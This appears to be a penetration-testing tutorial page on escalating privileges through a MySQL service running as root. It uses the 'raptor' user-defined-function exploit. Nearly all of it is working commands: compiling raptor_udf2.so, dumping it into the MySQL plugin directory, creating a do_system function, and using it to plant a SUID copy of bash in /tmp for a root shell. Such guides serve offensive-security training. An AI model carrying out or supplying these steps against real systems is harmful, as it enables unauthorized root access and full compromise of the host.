MySQL Service UDF Exploit
MySQL provides multiple ways to execute shell commands directly on the system. Here we are going to exploit using the user defined function.

Once you gain initial access to the target machine, you need to verify that the MySQL service is running as the root user and that you can log in without a password as the root user. Alternatively, you can proceed if you have the root user's password.
ps aux | grep mysql
mysql -u root

We can use a popular exploit 'raptor' that leverages User Defined Functions (UDFs) to execute system commands as the root user through the MySQL service. Before proceeding with the exploit, we need to compile it and convert it into a shared object, similar to a DLL on a Windows machine service.
gcc -g -c raptor_udf2.c -fPIC
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
As a typical user, we usually do not have write access to ‘/usr/lib/mysql/plugin/’. In this scenario, we are going to write the shared object file using the MySQL service. We selected the ‘mysql’ database within the SQL service that is available in my compromised machine, created a table named ‘foo,’ inserted the converted shared object file into the ‘foo’ table, then wrote the file into the MySQL plugin directory at ‘/usr/lib/mysql/plugin/’, and created a new function named ‘do_system’ using the written shared object file.
use mysql;
Select * from mysql.func;  #to list the user defined functions
create table foo(line blob);
insert into foo values(load_file('/home/user/tools/mysql-udf/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
Using the created ‘do_system’ function, we copy the ‘/bin/bash’ binary to ‘/tmp/rootbash’ and modify the permissions of ‘/tmp/rootbash’ to make it executable with the group SUID (Set User ID) permission.
select do_system('cp /bin/bash /tmp/rootbash; chmod +xs /tmp/rootbash');
Afterward, you can run the ‘/tmp/rootbash’ executable with the ‘-p’ option to obtain a shell running with root privileges.
/tmp/rootbash -p
㊙️Follow us on our below official handles for future updates:
sekkio_LinkedIn, sekkio_X, sekkio_Insta, sekkio_Medium, sekkio_Gitbook
Last updated
Was this helpful?
